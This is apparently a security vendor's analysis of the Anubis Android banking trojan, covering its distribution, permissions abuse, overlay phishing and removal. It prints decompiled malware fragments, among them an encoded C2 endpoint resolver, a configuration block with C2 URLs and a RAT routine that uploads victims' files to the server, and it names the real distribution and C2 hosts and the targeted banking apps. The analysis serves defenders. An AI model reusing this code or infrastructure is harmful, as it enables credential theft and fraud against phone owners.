Trojan.Android.Anubis.Banker

General Explanation

Type: Trojan

Degree of destruction: average

Prevalence: average

What is Trojan?

Trojans are malware that revealed themselves in the format of an applicable and useful tool. Accordingly, the user downloads and installs them and infects the system without notices that it is malware. Trojans, usually after installation, act as a backdoor so the hacker can remotely access the victim’s system. For instance, the malware we will analyze here seems to do an applicable and useful job, but it will install an unwanted application on the system.

What is the Anubis Trojan family?

There are many applications with the title of Free 5G، 20GBHediye، 20gb_hediye_internet, etc. There is so much like malware with different hash and infected URLs. For instance, the user will download this application as “20gb-hedie-internet” from http://xn--20gbnternethedyendowland-tvdk.com/20gb_hediye_internet.apk. After running this application, the malware attempts to receive settings related to accessibility access services and immediately after reaching this goal, will hide the application icon and start its malicious actions in the background. Some of actions that will be done in the user’s phone are:

  1. There are so many dangerous accesses that this malware will receive from the user (attaining user’s local place, internet status, reading contact list, reading income/outcome messages, voice recording and writing messages, etc.)
  2. Ability to send and receive SMS
  3. Finding a user’s geographical positioning (GPS)
  4. Opening and specific page in the user’s browser, the goal page address, is sent from a malware-infected server to the user’s phone.
  5. Loading another .apk file dynamically and at the time of program running (this job will be done for purposes such as showing advertising on the user’s phone.
  6. Keylogging
  7. Possibility of taking a screenshot of the user’s keyboard
  8. Attempt calling with specific numbers that are sent from the server.

Technical Explanation

As soon as running the program, activity accessibility will recall receiving the related settings of accessibility access service and until the user does not give any access to the application, will continuously show this message to the user. The appeared message is in Turkish and with this theme that if you wish to activate this application you need to activate accessibility access for the app. As soon as the user enables access to the application, malware with no trouble will enable all its accessibility permissions for itself which are most dangerous and are for next suing. As a result of dynamic file checking, you can view that this malware, will drop some files in the following folders and in the data/data path:

  1. App_apk: there is a .apk file in this folder that at the moment of execution by using DexClassLoader, API will be loaded by the initial file and some of the malicious actions will be done by this file. Also, for Android version 5 or higher, there is a .oat file and the goal of its loading is to show advertising on the user’s phone.
  2. App_outdex: at the time of execution, the application will check, if the version of the android is API16 and API26 and if there is an .apk file in the path, to show advertising (notification) will load its API by using DexClassLoader. The name of the application package that desire to load it is “apps.com.app.utils”. It do this action by separate service in the application.
  3. Shared_prefs: in this section there is a file named: “set.xml” that called as the application configuration file. I.e. malware reads some orders from this file at the time of execution (dynamic) and in exchange for them will run its malicious codes. The reason for malware to use this as local at the time of execution is that maybe this application which acts as a type of android Bot, for any reason cannot connect properly with its servers at the time of execution or receiving necessary instructions from them.

After executing this application, according to the configuration file, if you wish to recall the “WebSocket” value:

This malware will communicate with its command and control server or dedelik.com. It uses POST to send encrypted information from user’s phone to a4.php, a14.php, and a3.php and in return receives instructions to perform malicious actions in the user’s phone.

Immediately the https://www.saglik.gov.tr/ website will be open in the user’s browser, i.e. malware has the ability to initiate the user’s browser with the URL that receives from its command and control server.

The addresses of all servers which the application will be connected to and due to them will receive the message and execute them in user’s phone are encoded with base64 algorithm.

public String fddo(ContextparamContext, StringparamString1, StringparamString2)

{

try

{

if  (jdMethod_catch(paramContext))

{

localint=new oawx.minoxvx.ahlpf.fddo.int();

if (paramString1.equals(jdField_int("MQ==")))

str = jdField_int("L28xby9hMy5waHA=");

if  (paramString1.equals(jdField_int("Mg==")))

str = jdField_int("L28xby9hNC5waHA=");

if  (paramString1.equals(jdField_int("Mw==")))

str = jdField_int("L28xby9hNS5waHA=");

if  (paramString1.equals(jdField_int("NA==")))

str = jdField_int("L28xby9hNi5waHA=");

if  (paramString1.equals(jdField_int("NQ==")))

str = jdField_int("L28xby9hNy5waHA=");

if  (paramString1.equals(jdField_int("Ng==")))

str = jdField_int("L28xby9hOC5waHA=");

if  (paramString1.equals(jdField_int("Nw==")))

str = jdField_int("L28xby9hOS5waHA=");

if  (paramString1.equals(jdField_int("MTA=")))

str = jdField_int("L28xby9hMTAucGhw");

if  (paramString1.equals(jdField_int("MTE=")))

str = jdField_int("L28xby9hMTEucGhw");

if  (paramString1.equals(jdField_int("MTI=")))

str = jdField_int("L28xby9hMTIucGhw");

if  (paramString1.equals(jdField_int("MTM=")))

str = jdField_int("L28xby9hMTMucGhw");

if  (paramString1.equals(jdField_int("MTQ=")))

str = jdField_int("L28xby9hMTQucGhw");

if  (paramString1.equals(jdField_int("MTU=")))

str = jdField_int("L28xby9hMTUucGhw");

if  (paramString1.equals(jdField_int("MjU=")))

str=jdField_int("L28xby9hMjUucGhw");

}

}

catch(ExceptionparamContext)

{

try

{

oawx.minoxvx.ahlpf.fddo.intlocalint;

Stringstr;

paramString1=fddo(paramContext,jdField_int("dXJs"));

paramContext=paramString1;

if (paramString1 == null)

paramContext=this.fddo.jdField_for;

paramString1=newStringBuilder();

paramString1.append(paramContext);

paramString1.append(str);

return localint.fddo(paramString1.toString(), paramString2);

label372:fddo(jdField_int("RVJST1I="),jdField_int("Q2xhc3MgVXRpbHNDbGFzcywgUE9TVCAtPiBVUkw="));

return null;

paramContext=jdField_int("PHRhZz48L3RhZz4=");

return paramContext;

while (true)

{

return jdField_int("PHRhZz48L3RhZz4=");

paramContext=paramContext;

}

}

catch(ExceptionparamContext)

{

break label372;

}

}

}

The name of the servers are as follows and that in each level according to the type of action information will send/receive to/from which server, is up to “jdField_int” that recalled from “ifdf”

  • jdField_int = 1 ::/o1o/a3.php
  • jdField_int = 2 ::/o1o/a4.php
  • jdField_int = 3 ::/o1o/a6.php
  • jdField_int = 4 ::/o1o/a6.php
  • jdField_int = 5 ::/o1o/a7.php
  • jdField_int = 6 ::/o1o/a8.php
  • jdField_int = 7 ::/o1o/a9.php
  • jdField_int = 10 ::/o1o/a10.php
  • jdField_int = 11 ::/o1o/a11.php
  • jdField_int = 12 ::/o1o/a12.php
  • jdField_int = 13 ::/o1o/a13.php
  • jdField_int = 14 ::/o1o/a14.php
  • jdField_int = 15 ::/o1o/a15.php
  • jdField_int = 25 ::/o1o/a25.php

In addition to malware configuration file named set.xml, which is in the path of data/data/shared_prefs and it will be used during the malware execution, there are set of supra instruction in the application code, which are hard encoded. There are some existence dangerous orders in the configuration file and application code that can spying and extracting important personal information from the infected device:

  • keylogger: stealing pressed key information from the user’s keyboard.
  • GPS specifies the user’s location.
  • spam SMS: sending spam SMS
  • VNC_Start_New
  • startRecordingSound: recording sound
  • htmllocker: shows the ransom-related page after encrypting the files (the code of this section is not activated in this type of malware).
  • urlInjr: it’s for initiating a web page in the user’s browser.
  • textPlayProtect: it is one of the orders and its value is equal to the string: “the system is not working properly, please disable Google Play Protect”.

Malware builder when attempts to activate Play Protect, will show warnings to the user. Because one of the malware actions is disabling this service to stay un-recognized on the user’s phone. So, first, check the language of the user’s phone and this message can appear in multiple languages. The languages of this messages are as follows:

[(Russia (RU), United States (US),Turkish (TR),German (DE),Italy (IT),France (FR),Ukraine (UA ]

public void setSharedPreferences(Contextcontext){

if (VERSION.SDK_INT >= 19) {

this.setSharedPreference(context, "swspacket",

Sms.getDefaultSmsPackage(context).toString());

} else  {

this.setSharedPreference(context, "swspacket", "");

}

this.setSharedPreference(context, "VNC_Start_NEW",

"http://ktosdelaetskrintotpidor.com");

this.setSharedPreference(context,"Starter",

"http://sositehuypidarasi.com");

this.setSharedPreference (context, "time_work", "0");

this.setSharedPreference (context, "time_start_permission", "0");

StringBuildervar2 = newStringBuilder() ;

var2.append("") ;

this.constants.getClass() ;

var2.append("http://update-apk.net".replace(" ",""));

this.setSharedPreference(context,"urls",var2.toString());

var2=newStringBuilder();

var2.append("");

this.constants.getClass();

var2.append("".replace(" ",""));

this.setSharedPreference(context,"urlInj",var2.toString());

var2=newStringBuilder();

var2.append("");

this.constants.getClass();

var2.append(10000);

this.setSharedPreference(context,"interval",var2.toString());

this.setSharedPreference(context,"name","false");

this.setSharedPreference(context,"perehvat_sws","false");

this.setSharedPreference(context,"del_sws","false");

this.setSharedPreference(context,"network","false");

this.setSharedPreference(context,"gps","false");

this.setSharedPreference(context,"madeSettings","1 2 3 4 5 6 7 8 9 10 11 12 13 ");

this.setSharedPreference(context,"RequestINJ","");

this.setSharedPreference(context,"RequestGPS","");

this.setSharedPreference(context,"save_inj","");

this.setSharedPreference(context,"SettingsAll","");

this.setSharedPreference(context,"getNumber","false");

this.setSharedPreference(context,"dateCJ","");

this.setSharedPreference(context,"iconCJ","0:0");

this.setSharedPreference(context,"str_push_fish","");

this.setSharedPreference(context,"timeStartGrabber","");

this.setSharedPreference(context,"checkStartGrabber","0");

this.setSharedPreference(context,"startRequest","Access=0Perm=0");

this.setSharedPreference(context,"StringPermis","");

this.setSharedPreference(context,"StringActivate","activate");

this.setSharedPreference(context,"StringAccessibility","Enable access for");

this.setSharedPreference(context,"StringYes","");

this.setSharedPreference(context,"uninstall1","");

this.setSharedPreference(context,"uninstall2","");

this.setSharedPreference(context,"vkladmin","");

this.setSharedPreference(context,"websocket","");

this.setSharedPreference(context,"vnc","start");

this.setSharedPreference(context,"sound","start");

this.setSharedPreference(context,"straccessibility","");

this.setSharedPreference(context,"straccessibility2","");

this.setSharedPreference(context,"findfiles","");

this.setSharedPreference(context,"foregroundwhile","");

this.setSharedPreference(context,"cryptfile","false");

this.setSharedPreference(context,"status","");

this.setSharedPreference(context,"key","");

this.setSharedPreference(context,"htmllocker","");

this.setSharedPreference(context,"lock_amount","");

this.setSharedPreference(context,"lock_btc","");

this.setSharedPreference(context,"keylogger","");

this.setSharedPreference(context,"recordsoundseconds","0");

this.setSharedPreference(context,"startRecordSound","stop");

this.setSharedPreference(context,"play_protect","");

this.setSharedPreference(context,"textPlayProtect","");

this.setSharedPreference(context,"buttonPlayProtect","");

this.setSharedPreference(context,"spamSMS","");

this.setSharedPreference(context,"textSPAM","");

this.setSharedPreference(context,"indexSMSSPAM","");

this.setSharedPreference(context,"DexSocksMolude","");

this.setSharedPreference(context,"lookscreen","");

this.setSharedPreference(context,"step","0");

this.setSharedPreference(context,"id_windows_bot","");

...

Some of the other actions of this malware:

  • attaining user’s phone files

In fact, attain the list of all folders and files inside them and send them to its server (probably, it is doing it because of ransoming which is disabled in this case).

  • Possibility of send/receive SMS

For your application can appear as a default SMS application in your system settings, there must be some defined special capabilities in your manifest file such as:

  • minoxvx.ahlpf.Receiver.ReceiverMms: in a component receiver, an intent-filter named SMS_DELIVER_ACTION must be used which let the application to directly receive the received SMS in the user’s phone. All received messages of the user’s phone are readable with the number and the text.
  • minoxvx.ahlpf.Receiver.RecieverPushService: in a component receiver an intent-filter named WAP_PUSH_DELIVER_ACTION must be used and also type should be specified for (“application/vnd.wap.mms-message MIME) which let the application to receive the income MMS messages directly.
  • The oawx.minoxvx.ahlpf.SendSms activity due to an intent-filter named BROWSABLE will offer this application as a message delivery application, when user is opening applications such as SMS, SMSTO, MMS, and MMSTO. So, here, this application is used for sending messages.
  • minoxvx.ahlpf.ServiceHeadlessSmsSend service due to using an intent-filter named ACTION_RESPONSE_VIA_MESSAGE (“android.intent.action.RESPOND_VIA_MESSAGE”) by using algorithms such as: sms, smsto, mms and mmsto) will allow users to respond to your income SMS and calls.

<receiverandroid:name="oawx.minoxvx.ahlpf.Receiver.ReceiverMms"android:permission="android.permission.BROADCAST_SMS">

<intent-filter>

<actionandroid:name="android.provider.Telephony.SMS_DELIVER"/>

</intent-filter>

</receiver>

<receiverandroid:enabled="true"android:name="oawx.minoxvx.ahlpf.Receiver.RecieverPushService"android:permission="android.permission.BROADCAST_WAP_PUSH">

<intent-filter>

<actionandroid:name="android.provider.Telephony.WAP_PUSH_DELIVER"/>

<dataandroid:mimeType="application/vnd.wap.mms-message"/>

</intent-filter>

</receiver>

<activityandroid:name="oawx.minoxvx.ahlpf.SendSms">

<intent-filter>

<actionandroid:name="android.intent.action.SEND"/>

<actionandroid:name="android.intent.action.SENDTO"/>

<dataandroid:scheme="sms"/>

<dataandroid:scheme="smsto"/>

<dataandroid:scheme="mms"/>

<dataandroid:scheme="mmsto"/>

<categoryandroid:name="android.intent.category.DEFAULT"/>

<categoryandroid:name="android.intent.category.BROWSABLE"/>

</intent-filter>

</activity>

<serviceandroid:exported="true"android:name="oawx.minoxvx.ahlpf.ServiceHeadlessSmsSend"android:permission="android.permission.SEND_RESPOND_VIA_MESSAGE">

<intent-filter>

<actionandroid:name="android.intent.action.RESPOND_VIA_MESSAGE"/>

<categoryandroid:name="android.intent.category.DEFAULT"/>

<dataandroid:scheme="sms"/>

<dataandroid:scheme="smsto"/>

<dataandroid:scheme="mms"/>

<dataandroid:scheme="mmsto"/>

</intent-filter>

</service>

Following location

Attaining latitude and longitude to find GPS coordinates, user’s location, or the place user attends in include address, latitude and longitude could be attainable.

Scam in e-banking

One of the malicious actions of this malware is a scam in e-banking. So, it checks a huge list of e-banking applications in its application which all of which are bilayer and encrypted with base 64 coding algorithm.

By using (getInstalledApplications), API checks 128 its applications with the list of installed applications in the user’s phone. This malware navigates more than 100 applications and capable to show scams for stealing verified documentations. Most applications are banking applications and in general, fall into the following categories:

  • Shopping
  • Banking
  • Stock trading

The goal of the malware builder is to check to execute processes in the background and detect if the process relates to each one of the goal-oriented executing applications. After initiating one of the goal-oriented applications by overlay attacks and android accessibility services, the scam form of log-in to the system will be appeared to phishing user’s secret information in its own window and it wants the user to enter the account name, password, and other critical data. The related page will be sent by the command and control server and malware can receive all applications which are currently running on the phone. This matter will be done due to PACKAGE_USAGE_STATS permission, which the user gave to it.

BankBot Anubis uses the android accessibility services to do keylogging as a way to attain user’s credit card information when accessing a mobile goal-oriented banking application. In most android banking Trojans, the malware uses a fake overlay screen to access to user’s data by accessing the user to a Goal application.

Accessibility services

This service is running in the background and receives the callbacks which will send from android OS, by accessibilityEvents. Actually, these events are transactions between a user and the system; such as when screen focus is changed, a button is clicked and etc.

To attain these kinds of services, there must be possible to request the ability to query from active window content. For this matter, it can navigate user’s activities and have the ability to search in cases such as message boxes. Each accessibility event has the source component that defines which application is the reason for current events. For instance, different types that had been used in the malware are as follows:

  • TYPE_VIEW_CLICKED
  • TYPE_VIEW_FOCUSED
  • TYPE_VIEW_TEXT_CHANGED
  • TYPE_WINDOW_STATE_CHANGED
    • Screen capture

Also, this malware is able to capture images of the user’s keyboard, when he/she is entering credit card information or personal profile in the mentioned application.

List of applications:

Name of the application package name
VK — live chatting & free calls com.vkontakte.android
Bankia es.cm.android
Ba3nkia Wallet com.bankia.wallet
Best Buy com.bestbuy.android
SantanderSign mobile.santander.de
ebay com.ebay.mobile
Kuveyt Türk com.kuveytturk.mobil
Odeabank com.magiclick.odeabank
Papara com.mobillium.papara
CEPTETEB com.teb
VakıfBank Mobil Bankacılık com.vakifbank.mobile
ŞEKER MOBİL ŞUBE tr.com.sekerbilisim.mbank
Akbank com.akbank.android.apps.akbank_direkt
Akbank com.akbank.android.apps.akbank_direkt_tablet
Akbank Direkt Şifreci com.akbank.softotp
Akbank com.akbank.android.apps.akbank_direkt_tablet_20
Akbank Sanat com.fragment.akbank
Yapı Kredi Mobile com.ykb.android
Yapı Kredi Corporate-For Firms com.ykb.android.mobilonay
Yapı Kredi Cüzdan com.ykb.avm
Yapı Kredi Mobil Şube com.ykb.androidtablet
YapıKredi Azərbaycan MobilBank com.veripark.ykbaz
ÇEKSOR com.softtech.iscek
JSC İŞBANK com.yurtdisi.iscep
İşTablet com.softtech.isbankasi
ISBANK Online com.monitise.isbankmoscow
QNB Finansbank Cep Şubesi com.finansbank.mobile.cepsube
Enpara.com Cep Şubesi finansbank.enpara
FinansPOS com.magiclick.FinansPOS
QNB Finansinvest com.matriksdata.finansyatirim
Enpara.com Şirketim Cep Şubesi finansbank.enpara.sirketim
QNB Mobile com.vipera.ts.starter.QNB
QNB National Day com.redrockdigimark
Garanti Mobile Banking com.garanti.cepsubesi
Garanti CepBank com.garanti.cepbank
GarantiBank com.garantibank.cepsubesiro
Garanti Cep Şifrematik biz.mobinex.android.apps.cep_sifrematik
Garanti FX Trader com.garantiyatirim.fx
Halkbank Mobil com.tmobtech.halkbank
Halkbank Şifrebaz Cep com.SifrebazCep
Halkbank Mobile App eu.newfrontier.iBanking.mobile.Halk.Retail
Halk Trade tr.com.tradesoft.tradingsystem.gtpmobile.halk
Halkbank Nerede com.DijitalSahne.EnYakinHalkbank
Ziraat Mobil com.ziraat.ziraatmobil
Ziraat Tablet com.ziraat.ziraattablet
Ziraat Trader com.matriksmobile.android.ziraatTrader
Ziraat Trader HD com.matriksdata.ziraatyatirim.pad
PayPal Cash App: Send and Request Money Fast com.paypal.android.p2pmobile
NETELLER – fast, secure and global money transfers com.moneybookers.skrillpayments.neteller
Skrill – Fast, secure online payments com.moneybookers.skrillpayments
ING Bankieren com.ing.mobile
İşCep com.pozitron.iscep
VakıfBank Cep Şifre com.pozitron.vakifbank
BtcTurk Bitcoin Borsası com.btcturk
Albaraka Mobil Şube com.pozitron.albarakaturk
Binance – Cryptocurrency Exchange com.binance.dev
Binance: Cryptocurrency & Bitcoin Exchange com.binance.odapplications
Blockfolio – Bitcoin and Cryptocurrency Tracker com.blockfolio.blockfolio
Crypto App – Widgets, Alerts, News, Bitcoin Prices com.crypter.cryptocyrrency
Delta – Bitcoin & Cryptocurrency Portfolio Tracker io.getdelta.android
My CryptoCoins Portfolio – All Coins com.edsoftapps.mycoinsvalue
Coin Profit com.coin.profit
Coin Market-Bitcoin Prices,Currencies,BTC,EUR,ICO com.mal.saul.coinmarketcap
Coin Portfolio for Bitcoin & Altcoin tracker com.tnx.apps.coinportfolio
Coinbase – Buy Bitcoin & more. Secure Wallet com.coinbase.android
Coinbase Tracker (3rd party) com.portfolio.coinbase_tracker
Bitcoin Wallet de.schildbach.wallet
Blockchain Wallet. Bitcoin, Bitcoin Cash, Ethereum piuk.blockchain.android
Blockchain Merchant info.blockchain.merchant
Bitcoin Blockchain Explorer com.jackpf.blockchainsearch
Unocoin Wallet com.unocoin.unocoinwallet
Unocoin Merchant PoS com.unocoin.unocoinmerchantPoS
UNOCOIN LIVE com.thunkable.android.santoshmehta364.UNOCOIN_LIVE
Zebpay Calculator – Profit/Loss Management wos.com.zebpay
LocalBitCoins Official com.localbitcoinsmbapp
LocalBitCoins com.thunkable.android.manirana54.LocalBitCoins
UNBLOCK Local BitCoins com.thunkable.android.manirana54.LocalBitCoins_unblock
LocalBitcoins – Buy and sell Bitcoin com.localbitcoins.exchange
LocalBitCoins com.coins.bit.local
LocalBitCoins NEW com.coins.ful.bit
Local BitCoin com.jamalabbasii1998.localbitcoin
Zebpay Bitcoin and Cryptocurrency Exchange zebpay.Application
Zebpay India com.bitcoin.ss.zebpayindia
Jaxx Blockchain Wallet com.kryptokit.jaxx
  • Remote access Trojan (RAT)

This malware has the RAT ability and can allow attackers to issue orders and remote the infected device.

Malware is a separated service named ServiceRAT which has the following goals:

Opendir: send the list of all existence files in the subfolders and directories to the server.

Downloadfile: sending the file to the malware server

Deletefilefolder: removing a specified file or folder in user’s phone

startscreenVNC: sending screenshot from user’s phone to malware server in each 0.5seconds

stopscreenVNC:

startsound: recording audio

noconnection: stoping the related service

if (command.contains("downloadfile:")) {

command=command.replace("downloadfile:","").split("!!!!")[0];

this.functions.deletedLoggingFunction("file",command);

try{

this.functions.sendFile(this,command,"","getfiles[]");

httpConnector=this.httpConnector;

var4=newStringBuilder();

var4.append(var3);

this.constants.getClass();

var4.append("/o1o/a2.php");

Stringvar24=var4.toString();

data=newStringBuilder();

data.append("tuk_tuk=");

Functionsfunctions3=this.functions;

var4=newStringBuilder();

var4.append(this.a);

var4.append("|:|!!!refreshfilefolder!!!");

data.append(functions3.encode(var4.toString()));

httpConnector.doRequest(var24,data.toString());

}catch(Exceptionvar11){

functions2=this.functions;

command="error sender";

break;

}

How to deal with it and disinfect the system

Anubis malware will check all accessibility Events. If a page is opened by the user, due to that the TYPE_WINDOW_STATE_CHANGED event will be sent to the application and at this time will check inside the application code, whether the opened window is related to AAS and application setting. The following terms will be analyzing immediately:

  1. Whether Event is related to the opened window due to com.android.settings and or accessibility service.
  2. Malware will check a series of specific strings in the event description:
    • Uninstall
    • To remove

In these two modes, the user will immediately refer to the Home screen and the related application will be closed, i.e. from settings. Since normally it cannot be possible to delete the application, the following solutions for disinfecting infected applications of the phone:

  • Install another application manager except for application settings that are normally on the phone, so with the help of this service, you can kill the program and then uninstall it.
  • Boot the system from safe mode, and disable and remove the application from the running application section.
  • Connect to the phone By using adb tools, and by using the name of the package “minoxvx.ahlpf” and with the order adb uninstall package name remove the application from your phone

To make sure that the system is safe, install Padvish antivirus and keep its database file and scan it.

Methods of preventing phone infection

  1. Avoid downloading and installing any application from unauthorized resources/markets.
  2. Note the requested permissions, when installing the mobile application.
  3. Continuously back up your saved data and files.
  4. Do not use an unofficial version of applications. Applications such as Telegram, Instagram have many unofficial versions and most of them release through Telegram channels.

Leave a Reply

Your email address will not be published. Required fields are marked *

You may use these HTML tags and attributes: <a href="" title=""> <abbr title=""> <acronym title=""> <b> <blockquote cite=""> <cite> <code> <del datetime=""> <em> <i> <q cite=""> <s> <strike> <strong>